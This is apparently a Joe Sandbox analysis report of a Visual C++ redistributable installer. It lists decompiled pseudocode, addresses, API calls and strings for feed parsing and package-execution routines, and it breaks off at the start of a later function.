                                                                          0x00058140
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005814e
                                                                          0x00058151
                                                                          0x00000000
                                                                          0x00058151
                                                                          0x00000000
                                                                          0x000581aa
                                                                          0x0005804e
                                                                          0x00058050
                                                                          0x00058052
                                                                          0x00000000
                                                                          0x00058058
                                                                          0x00058058
                                                                          0x00058099
                                                                          0x00058099
                                                                          0x0005809c
                                                                          0x0005809e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058066
                                                                          0x0005806d
                                                                          0x00058073
                                                                          0x00058076
                                                                          0x00058093
                                                                          0x00058096
                                                                          0x00058096
                                                                          0x00000000
                                                                          0x00058096
                                                                          0x00058080
                                                                          0x00058089
                                                                          0x0005808b
                                                                          0x0005808d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005808d
                                                                          0x00000000
                                                                          0x00058099
                                                                          0x00058052
                                                                          0x000580b0
                                                                          0x000580b9
                                                                          0x00058209
                                                                          0x0005820c
                                                                          0x0005820f
                                                                          0x00058235
                                                                          0x00058235
                                                                          0x00058238
                                                                          0x0005823c
                                                                          0x00058256
                                                                          0x00058256
                                                                          0x0005825a
                                                                          0x00058274
                                                                          0x00058274
                                                                          0x00058277
                                                                          0x00058279
                                                                          0x000582b8
                                                                          0x000582c1
                                                                          0x000582c6
                                                                          0x000582c9
                                                                          0x000582cb
                                                                          0x000582dd
                                                                          0x000582e1
                                                                          0x000582e5
                                                                          0x0005835d
                                                                          0x0005835d
                                                                          0x00000000
                                                                          0x0005835d
                                                                          0x000582e7
                                                                          0x000582e7
                                                                          0x000582e9
                                                                          0x000582ec
                                                                          0x000582f6
                                                                          0x000582fa
                                                                          0x00058303
                                                                          0x00058309
                                                                          0x0005830c
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058320
                                                                          0x00058322
                                                                          0x00058324
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058326
                                                                          0x00058335
                                                                          0x00058335
                                                                          0x00058335
                                                                          0x0005833c
                                                                          0x00058342
                                                                          0x00058345
                                                                          0x00058348
                                                                          0x0005834e
                                                                          0x0005834f
                                                                          0x00058352
                                                                          0x00058355
                                                                          0x00058358
                                                                          0x00058358
                                                                          0x00000000
                                                                          0x000582ec
                                                                          0x000582cd
                                                                          0x000582d2
                                                                          0x000582d3
                                                                          0x00058226
                                                                          0x00058226
                                                                          0x0005822b
                                                                          0x00000000
                                                                          0x0005822b
                                                                          0x0005827b
                                                                          0x0005827e
                                                                          0x00058297
                                                                          0x00058297
                                                                          0x0005829a
                                                                          0x0005829e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000582a5
                                                                          0x000582ae
                                                                          0x000582b0
                                                                          0x000582b2
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000582b2
                                                                          0x00058284
                                                                          0x0005828d
                                                                          0x0005828f
                                                                          0x00058291
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058291
                                                                          0x00058261
                                                                          0x0005826a
                                                                          0x0005826c
                                                                          0x0005826e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005826e
                                                                          0x00058243
                                                                          0x0005824c
                                                                          0x0005824e
                                                                          0x00058250
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058250
                                                                          0x00058211
                                                                          0x0005821b
                                                                          0x0005821b
                                                                          0x00058220
                                                                          0x00058221
                                                                          0x00000000
                                                                          0x00058221
                                                                          0x00058213
                                                                          0x00058216
                                                                          0x00058219
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00058219
                                                                          0x00000000
                                                                          0x000580bf
                                                                          0x000580bf
                                                                          0x000580c1
                                                                          0x00000000
                                                                          0x000580c1

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,00000000,000002C0), ref: 00058019
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,application,000000FF), ref: 00058034
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,upgrade,000000FF), ref: 000580D7
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,00700079,000000FF,version,000000FF,00000018,0005B508,00000000), ref: 00058116
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,exclusive,000000FF), ref: 00058169
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,0005B508,000000FF,true,000000FF), ref: 00058187
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,version,000000FF), ref: 000581BF
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,enclosure,000000FF), ref: 00058303
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CompareString
                                                                          • String ID: application$apuputil.cpp$enclosure$exclusive$http://appsyndication.org/2006/appsyn$true$type$upgrade$version
                                                                          • API String ID: 1825529933-3037633208
                                                                          • Opcode ID: b6ea274b7c2433072512fee464aea507e8d84fdab66afc3fbfa7899b413c6661
                                                                          • Instruction ID: 518ee73df95034e2f2d5720c38aec19e261251fd14da35d57ef902c799def7da
                                                                          • Opcode Fuzzy Hash: b6ea274b7c2433072512fee464aea507e8d84fdab66afc3fbfa7899b413c6661
                                                                          • Instruction Fuzzy Hash: 61B19D71904702ABDBA09F54CC81F9B77F6AB44722F248614FD29EB2D2DB75E848CB04
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00039BB3 Relevance: 31.7, APIs: 4, Strings: 14, Instructions: 230threadCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 72%
                                                                          			E00039BB3(void* _a4, intOrPtr* _a8, void* _a12, intOrPtr _a16, void* _a20, intOrPtr* _a24, void* _a28, intOrPtr _a32, intOrPtr* _a36) {
				long _v8;
				HANDLE* _v12;
				char _v16;
				char _v20;
				HANDLE* _v24;
				void* _v28;
				signed int _t64;
				intOrPtr* _t78;
				long _t79;

				_t79 = 0;
				_v28 = 0;
				_t78 = _a8;
				_v8 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				 *((intOrPtr*)(_a16 + 4)) = 0;
				while(1) {
					L1:
					_t64 =  *_t78 - 1;
					if(_t64 > 0xd) {
						break;
					}
					switch( *((intOrPtr*)(_t64 * 4 +  &M00039E43))) {
						case 0:
							_t74 = _a24;
							goto L28;
						case 1:
							__eax =  *(__edi + 8);
							__esi = _a12;
							_v28 =  *(__edi + 8);
							 &_v28 = 0;
							_v24 = __esi;
							__eflags = __esi;
							0 | __eflags != 0x00000000 = (__eflags != 0) + 1;
							__eax = WaitForMultipleObjects((__eflags != 0) + 1,  &_v28, 0, 0xffffffff);
							__eflags = __eax;
							if(__eax != 0) {
								__eflags = __eax - 1;
								if(__eax == 1) {
									__eax =  &_v8;
									__eax = GetExitCodeThread(__esi,  &_v8);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = _v8;
										__ecx = 0x8000ffff;
										__eflags = __eax;
										_push("Cache thread exited unexpectedly.");
										__eax =  >=  ? 0x8000ffff : __eax;
										L41:
										_push(0x8000ffff);
										_v8 = 0x8000ffff;
									} else {
										__eax = GetLastError();
										__ax & 0x0000ffff = __ax & 0x0000ffff | 0x80070000;
										__eflags = __eax;
										__ecx =  <=  ? __eax : __ax & 0x0000ffff | 0x80070000;
										__eax = 0x80004005;
										__eflags = __ecx;
										_v8 = __ecx;
										__eax = E000137D3(0x80004005, "apply.cpp", 0x654, __ecx);
										_push("Failed to get cache thread exit code.");
										goto L36;
									}
								} else {
									__eax = GetLastError();
									__ax & 0x0000ffff = __ax & 0x0000ffff | 0x80070000;
									__eflags = __eax;
									__ecx =  <=  ? __eax : __ax & 0x0000ffff | 0x80070000;
									__eax = 0x80004005;
									__eflags = __ecx;
									__ecx =  >=  ? 0x80004005 : __ecx;
									__eflags = __ecx;
									_v8 = __ecx;
									__eax = E000137D3(0x80004005, "apply.cpp", 0x65f, __ecx);
									_push("Failed to wait for cache check-point.");
									L36:
									_push(_v8);
								}
								goto L42;
							} else {
								__esi = _v8;
								goto L6;
							}
							goto L43;
						case 2:
							goto L40;
						case 3:
							 &_v20 =  &_v16;
							__esi = E0003A29B(__ebx, __edi, __ecx, 0,  &_v16, _a32,  &_v20);
							_v8 = __esi;
							__eflags = __esi;
							if(__esi >= 0) {
								goto L6;
							} else {
								_push("Failed to execute EXE package.");
								goto L9;
							}
							goto L43;
						case 4:
							 &_v20 =  &_v16;
							__esi = E0003A4A0(__ebx, __edi, __ecx, 0,  &_v16, _a32,  &_v20);
							_v8 = __esi;
							__eflags = __esi;
							if(__esi >= 0) {
								goto L6;
							} else {
								_push("Failed to execute MSI package.");
								goto L9;
							}
							goto L43;
						case 5:
							 &_v20 =  &_v16;
							__esi = E0003A5FB(__ebx, __edi, __ecx, 0,  &_v16, _a32,  &_v20);
							_v8 = __esi;
							__eflags = __esi;
							if(__esi >= 0) {
								goto L6;
							} else {
								_push("Failed to execute MSP package.");
								goto L9;
							}
							goto L43;
						case 6:
							 &_v20 =  &_v16;
							__eax = E0003A7B9(__ebx, __edi, __ecx, 0, __edx,  &_v16, _a32,  &_v20);
							__edx = _v16;
							__esi = __eax;
							_v8 = __esi;
							_v12 = __edx;
							__eflags = __esi;
							if(__esi >= 0) {
								goto L29;
							} else {
								_push("Failed to execute MSU package.");
								goto L9;
							}
							goto L43;
						case 7:
							_push(__ecx);
							__esi = E0003AA9D(__edx, __ebx, __edi);
							_v8 = __esi;
							__eflags = __esi;
							if(__esi >= 0) {
								goto L6;
							} else {
								_push("Failed to execute package provider registration action.");
								goto L9;
							}
							goto L43;
						case 8:
							_push(__ecx);
							__esi = E0003A1F1(__edx, __ebx, __edi);
							_v8 = __esi;
							__eflags = __esi;
							if(__esi >= 0) {
								L6:
								__edx = _v12;
								goto L29;
							} else {
								_push("Failed to execute dependency action.");
								goto L9;
							}
							goto L43;
						case 9:
							__ecx = _a20;
							goto L28;
						case 0xa:
							__ecx = _a28;
							L28:
							 *_t74 =  *((intOrPtr*)(_t78 + 8));
							goto L29;
						case 0xb:
							__eax =  *(__edi + 8);
							__esi = 0;
							__eflags =  *( *(__edi + 8) + 0x14);
							if(__eflags != 0) {
								__esi = E0002DC2F(__ecx, __edx, __eflags,  *((intOrPtr*)(__ebx + 0x4b0)), __edi);
								__eflags = __esi;
								if(__esi < 0) {
									_push("Failed to load compatible package on per-machine package.");
									_push(__esi);
									__eax = E0005012F();
									_pop(__ecx);
									_pop(__ecx);
								}
								__edx = _v12;
							}
							_v8 = __esi;
							__eflags = __esi;
							if(__esi >= 0) {
								L29:
								_t75 = _a36;
								_t69 = _v20;
								if( *_t75 < _t69) {
									 *_t75 = _t69;
								}
								if(_v16 != 0 &&  *_t75 < 2) {
									goto L1;
								}
							} else {
								_push("Failed to execute compatible package action.");
								L9:
								_push(__esi);
								L42:
								E0005012F();
								_t79 = _v8;
							}
							L43:
							return _t79;
					}
				}
				L40:
				_push("Invalid execute action.");
				goto L41;
			}












                                                                          0x00039bc5
                                                                          0x00039bc7
                                                                          0x00039bcb
                                                                          0x00039bce
                                                                          0x00039bd1
                                                                          0x00039bd4
                                                                          0x00039bd7
                                                                          0x00039bda
                                                                          0x00039bdd
                                                                          0x00039be0
                                                                          0x00039be0
                                                                          0x00039be2
                                                                          0x00039be6
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039bec
                                                                          0x00000000
                                                                          0x00039bf3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039bfb
                                                                          0x00039bfe
                                                                          0x00039c01
                                                                          0x00039c0c
                                                                          0x00039c0e
                                                                          0x00039c11
                                                                          0x00039c16
                                                                          0x00039c18
                                                                          0x00039c1e
                                                                          0x00039c20
                                                                          0x00039d83
                                                                          0x00039d86
                                                                          0x00039dc3
                                                                          0x00039dc8
                                                                          0x00039dce
                                                                          0x00039dd0
                                                                          0x00039e0a
                                                                          0x00039e0d
                                                                          0x00039e12
                                                                          0x00039e14
                                                                          0x00039e19
                                                                          0x00039e28
                                                                          0x00039e28
                                                                          0x00039e29
                                                                          0x00039dd2
                                                                          0x00039dd2
                                                                          0x00039ddb
                                                                          0x00039de1
                                                                          0x00039de3
                                                                          0x00039de6
                                                                          0x00039deb
                                                                          0x00039dfb
                                                                          0x00039dfe
                                                                          0x00039e03
                                                                          0x00000000
                                                                          0x00039e03
                                                                          0x00039d88
                                                                          0x00039d88
                                                                          0x00039d91
                                                                          0x00039d97
                                                                          0x00039d99
                                                                          0x00039d9c
                                                                          0x00039da1
                                                                          0x00039da3
                                                                          0x00039da3
                                                                          0x00039db1
                                                                          0x00039db4
                                                                          0x00039db9
                                                                          0x00039dbe
                                                                          0x00039dbe
                                                                          0x00039dbe
                                                                          0x00000000
                                                                          0x00039c26
                                                                          0x00039c26
                                                                          0x00000000
                                                                          0x00039c26
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039c38
                                                                          0x00039c46
                                                                          0x00039c48
                                                                          0x00039c4b
                                                                          0x00039c4d
                                                                          0x00000000
                                                                          0x00039c4f
                                                                          0x00039c4f
                                                                          0x00000000
                                                                          0x00039c4f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039c61
                                                                          0x00039c6f
                                                                          0x00039c71
                                                                          0x00039c74
                                                                          0x00039c76
                                                                          0x00000000
                                                                          0x00039c78
                                                                          0x00039c78
                                                                          0x00000000
                                                                          0x00039c78
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039c86
                                                                          0x00039c94
                                                                          0x00039c96
                                                                          0x00039c99
                                                                          0x00039c9b
                                                                          0x00000000
                                                                          0x00039c9d
                                                                          0x00039c9d
                                                                          0x00000000
                                                                          0x00039c9d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039cab
                                                                          0x00039cb5
                                                                          0x00039cba
                                                                          0x00039cbd
                                                                          0x00039cbf
                                                                          0x00039cc2
                                                                          0x00039cc5
                                                                          0x00039cc7
                                                                          0x00000000
                                                                          0x00039ccd
                                                                          0x00039ccd
                                                                          0x00000000
                                                                          0x00039ccd
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039cd4
                                                                          0x00039cdc
                                                                          0x00039cde
                                                                          0x00039ce1
                                                                          0x00039ce3
                                                                          0x00000000
                                                                          0x00039ce9
                                                                          0x00039ce9
                                                                          0x00000000
                                                                          0x00039ce9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039cf3
                                                                          0x00039cfb
                                                                          0x00039cfd
                                                                          0x00039d00
                                                                          0x00039d02
                                                                          0x00039c29
                                                                          0x00039c29
                                                                          0x00000000
                                                                          0x00039d08
                                                                          0x00039d08
                                                                          0x00000000
                                                                          0x00039d08
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039d54
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039d4f
                                                                          0x00039d57
                                                                          0x00039d5a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039d12
                                                                          0x00039d15
                                                                          0x00039d17
                                                                          0x00039d1a
                                                                          0x00039d28
                                                                          0x00039d2a
                                                                          0x00039d2c
                                                                          0x00039d2e
                                                                          0x00039d33
                                                                          0x00039d34
                                                                          0x00039d39
                                                                          0x00039d3a
                                                                          0x00039d3a
                                                                          0x00039d3b
                                                                          0x00039d3b
                                                                          0x00039d3e
                                                                          0x00039d41
                                                                          0x00039d43
                                                                          0x00039d5c
                                                                          0x00039d5c
                                                                          0x00039d5f
                                                                          0x00039d64
                                                                          0x00039d66
                                                                          0x00039d66
                                                                          0x00039d6c
                                                                          0x00000000
                                                                          0x00039d7b
                                                                          0x00039d45
                                                                          0x00039d45
                                                                          0x00039c54
                                                                          0x00039c54
                                                                          0x00039e2c
                                                                          0x00039e2c
                                                                          0x00039e31
                                                                          0x00039e35
                                                                          0x00039e37
                                                                          0x00039e3e
                                                                          0x00000000
                                                                          0x00039bec
                                                                          0x00039e1e
                                                                          0x00039e23
                                                                          0x00000000

                                                                          APIs
                                                                          • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,00000001,00000000,00000000,?,0003BA53,00000001), ref: 00039C18
                                                                          • GetLastError.KERNEL32(?,0003BA53,00000001), ref: 00039D88
                                                                          • GetExitCodeThread.KERNEL32(00000001,00000000,?,0003BA53,00000001), ref: 00039DC8
                                                                          • GetLastError.KERNEL32(?,0003BA53,00000001), ref: 00039DD2
                                                                          Strings
                                                                          • Failed to execute MSI package., xrefs: 00039C78
                                                                          • Failed to execute compatible package action., xrefs: 00039D45
                                                                          • Failed to get cache thread exit code., xrefs: 00039E03
                                                                          • Failed to execute MSU package., xrefs: 00039CCD
                                                                          • apply.cpp, xrefs: 00039DAC, 00039DF6
                                                                          • Invalid execute action., xrefs: 00039E23
                                                                          • Failed to load compatible package on per-machine package., xrefs: 00039D2E
                                                                          • Failed to execute EXE package., xrefs: 00039C4F
                                                                          • Failed to execute package provider registration action., xrefs: 00039CE9
                                                                          • Failed to wait for cache check-point., xrefs: 00039DB9
                                                                          • Failed to execute MSP package., xrefs: 00039C9D
                                                                          • Failed to execute dependency action., xrefs: 00039D08
                                                                          • Cache thread exited unexpectedly., xrefs: 00039E14
                                                                          • @Met, xrefs: 00039D88, 00039DD2
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CodeExitMultipleObjectsThreadWait
                                                                          • String ID: @Met$Cache thread exited unexpectedly.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute compatible package action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to get cache thread exit code.$Failed to load compatible package on per-machine package.$Failed to wait for cache check-point.$Invalid execute action.$apply.cpp
                                                                          • API String ID: 3703294532-2194304339
                                                                          • Opcode ID: a6415e4adac44e34684583c6acc91822e1d79a6131434a102527c8caa3711720
                                                                          • Instruction ID: de36f6c51880942c5562ede6df9320f6d64d66bdc4b8cc3d477c9684f0127812
                                                                          • Opcode Fuzzy Hash: a6415e4adac44e34684583c6acc91822e1d79a6131434a102527c8caa3711720
                                                                          • Instruction Fuzzy Hash: FB716D71A01229EFDB16DF65C941ABEB7FDEF09710F114569F905EB241D3B0AE018BA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000576A1 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 210COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 75%
                                                                          			E000576A1(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* _t79;
				void* _t87;
				int _t95;
				int _t96;
				int _t97;
				void* _t100;
				void* _t106;
				intOrPtr* _t110;
				void* _t111;
				intOrPtr* _t113;
				intOrPtr* _t114;
				intOrPtr* _t115;
				intOrPtr _t118;
				void* _t120;
				void* _t122;
				void* _t131;
				void* _t139;

				_t110 = _a4;
				_t112 =  &_v20;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t120 =  *((intOrPtr*)( *_t110 + 0x44))(_t110,  &_v20);
				if(_t120 < 0) {
					L37:
					if(_v8 != 0) {
						__imp__#6(_v8);
					}
					_t113 = _v12;
					if(_t113 != 0) {
						 *((intOrPtr*)( *_t113 + 8))(_t113);
					}
					_t114 = _v16;
					if(_t114 != 0) {
						 *((intOrPtr*)( *_t114 + 8))(_t114);
					}
					_t115 = _v20;
					if(_t115 != 0) {
						 *((intOrPtr*)( *_t115 + 8))(_t115);
					}
					return _t120;
				}
				_t79 = E000536D7( &_v20, _v20,  &_v12,  &_v8);
				_t118 = _a8;
				_t120 = _t79;
				if(_t120 != 0) {
					L24:
					if(_t131 < 0) {
						L36:
						goto L37;
					}
					_t116 =  &_v16;
					_t120 =  *((intOrPtr*)( *_t110 + 0x30))(_t110,  &_v16);
					if(_t120 < 0) {
						goto L36;
					}
					_t120 = E00053760( &_v16, _v16,  &_v12,  &_v8);
					_t133 = _t120;
					if(_t120 != 0) {
						L34:
						if(_t139 >= 0) {
							_t120 = E000567C4(_t116, _t118 + 0x10, _t110);
						}
						goto L36;
					}
					_t87 = _t118 + 0x24;
					while(1) {
						_t120 = E000579CC(_t110, _t133, _v12, _t87);
						if(_t120 < 0) {
							goto L36;
						}
						if(_v8 != 0) {
							__imp__#6(_v8);
							_v8 = _v8 & 0x00000000;
						}
						_t116 = _v12;
						if(_t116 != 0) {
							 *((intOrPtr*)( *_t116 + 8))(_t116);
							_v12 = _v12 & 0x00000000;
						}
						_t120 = E00053760(_t116, _v16,  &_v12,  &_v8);
						_t87 = _t118 + 0x24;
						_t139 = _t120;
						if(_t139 == 0) {
							continue;
						} else {
							goto L34;
						}
					}
					goto L36;
				}
				_t111 = CompareStringW;
				do {
					if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"rel", 0xffffffff) != 2) {
						_t95 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"href", 0xffffffff);
						__eflags = _t95 - 2;
						if(_t95 != 2) {
							_t96 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"length", 0xffffffff);
							__eflags = _t96 - 2;
							if(_t96 != 2) {
								_t97 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"title", 0xffffffff);
								__eflags = _t97 - 2;
								if(_t97 != 2) {
									__eflags = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"type", 0xffffffff) - 2;
									if(__eflags != 0) {
										_t100 = E000578C5(_t111, __eflags, _v12, _t118 + 0x20);
										L16:
										_t120 = _t100;
										L17:
										if(_t120 < 0) {
											goto L36;
										}
										goto L18;
									}
									_t106 = _t118 + 8;
									L8:
									_push(_v12);
									_push(_t106);
									L5:
									_t100 = E000567C4(_t112);
									goto L16;
								}
								_t106 = _t118 + 4;
								goto L8;
							}
							_t122 = E0005329B(_a4, _v8, _t118 + 0x18);
							__eflags = _t122 - 0x80070057;
							_t120 =  ==  ? 0x8007000d : _t122;
							goto L17;
						}
						_t106 = _t118 + 0xc;
						goto L8;
					}
					_push(_v12);
					_push(_t118);
					goto L5;
					L18:
					if(_v8 != 0) {
						__imp__#6(_v8);
						_v8 = _v8 & 0x00000000;
					}
					_t112 = _v12;
					if(_t112 != 0) {
						 *((intOrPtr*)( *_t112 + 8))(_t112);
						_v12 = _v12 & 0x00000000;
					}
					_t120 = E000536D7(_t112, _v20,  &_v12,  &_v8);
					_t131 = _t120;
				} while (_t131 == 0);
				_t110 = _a4;
				goto L24;
			}

























                                                                          0x000576a8
                                                                          0x000576ab
                                                                          0x000576b1
                                                                          0x000576b4
                                                                          0x000576b7
                                                                          0x000576ba
                                                                          0x000576c4
                                                                          0x000576c8
                                                                          0x00057885
                                                                          0x00057889
                                                                          0x0005788e
                                                                          0x0005788e
                                                                          0x00057894
                                                                          0x00057899
                                                                          0x0005789e
                                                                          0x0005789e
                                                                          0x000578a1
                                                                          0x000578a6
                                                                          0x000578ab
                                                                          0x000578ab
                                                                          0x000578ae
                                                                          0x000578b3
                                                                          0x000578b8
                                                                          0x000578b8
                                                                          0x000578c2
                                                                          0x000578c2
                                                                          0x000576da
                                                                          0x000576df
                                                                          0x000576e2
                                                                          0x000576e6
                                                                          0x000577fb
                                                                          0x000577fb
                                                                          0x00057884
                                                                          0x00000000
                                                                          0x00057884
                                                                          0x00057803
                                                                          0x0005780b
                                                                          0x0005780f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00057821
                                                                          0x00057823
                                                                          0x00057825
                                                                          0x00057876
                                                                          0x00057876
                                                                          0x00057882
                                                                          0x00057882
                                                                          0x00000000
                                                                          0x00057876
                                                                          0x00057827
                                                                          0x0005782a
                                                                          0x00057833
                                                                          0x00057837
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0005783d
                                                                          0x00057842
                                                                          0x00057848
                                                                          0x00057848
                                                                          0x0005784c
                                                                          0x00057851
                                                                          0x00057856
                                                                          0x00057859
                                                                          0x00057859
                                                                          0x0005786d
                                                                          0x0005786f
                                                                          0x00057872
                                                                          0x00057874
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00057874
                                                                          0x00000000
                                                                          0x0005782a
                                                                          0x000576ec
                                                                          0x000576f2
                                                                          0x00057708
                                                                          0x00057727
                                                                          0x00057729
                                                                          0x0005772c
                                                                          0x00057746
                                                                          0x00057748
                                                                          0x0005774b
                                                                          0x0005777d
                                                                          0x0005777f
                                                                          0x00057782
                                                                          0x0005779a
                                                                          0x0005779d
                                                                          0x000577ab
                                                                          0x000577b0
                                                                          0x000577b0
                                                                          0x000577b2
                                                                          0x000577b4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000577b4
                                                                          0x0005779f
                                                                          0x00057731
                                                                          0x00057731
                                                                          0x00057734
                                                                          0x0005770e
                                                                          0x0005770e
                                                                          0x00000000
                                                                          0x0005770e
                                                                          0x00057784
                                                                          0x00000000
                                                                          0x00057784
                                                                          0x0005775c
                                                                          0x00057763
                                                                          0x00057769
                                                                          0x00000000
                                                                          0x00057769
                                                                          0x0005772e
                                                                          0x00000000
                                                                          0x0005772e
                                                                          0x0005770a
                                                                          0x0005770d
                                                                          0x00000000
                                                                          0x000577ba
                                                                          0x000577be
                                                                          0x000577c3
                                                                          0x000577c9
                                                                          0x000577c9
                                                                          0x000577cd
                                                                          0x000577d2
                                                                          0x000577d7
                                                                          0x000577da
                                                                          0x000577da
                                                                          0x000577ee
                                                                          0x000577f0
                                                                          0x000577f0
                                                                          0x000577f8
                                                                          0x00000000

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,rel,000000FF,?,?,?,00000000), ref: 00057703
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,href,000000FF), ref: 00057727
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,length,000000FF), ref: 00057746
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 0005777D
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,type,000000FF), ref: 00057798
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000577C3
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00057842
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 0005788E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$Compare$Free
                                                                          • String ID: comres.dll$feclient.dll$href$length$msasn1.dll$msi.dll$rel$title$type$version.dll
                                                                          • API String ID: 318886736-3944986760
                                                                          • Opcode ID: 94aed055e440d9ea081c688266cf93d32eec65c5f2bfa4b4d72d1c7efa1eac78
                                                                          • Instruction ID: c07c7e5c9b341952cae30bb5c188700e39256c26bc9f5dddf30c5bfa85cdb798
                                                                          • Opcode Fuzzy Hash: 94aed055e440d9ea081c688266cf93d32eec65c5f2bfa4b4d72d1c7efa1eac78
                                                                          • Instruction Fuzzy Hash: 71715435D08119FBDF11DB94DC45EAFBBB8EF08722F204694E919A7191DB319E08EB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0003CA34 Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 173processCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 51%
                                                                          			E0003CA34(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, intOrPtr _a20) {
				int _v8;
				int _v12;
				struct _PROCESS_INFORMATION _v28;
				intOrPtr _v32;
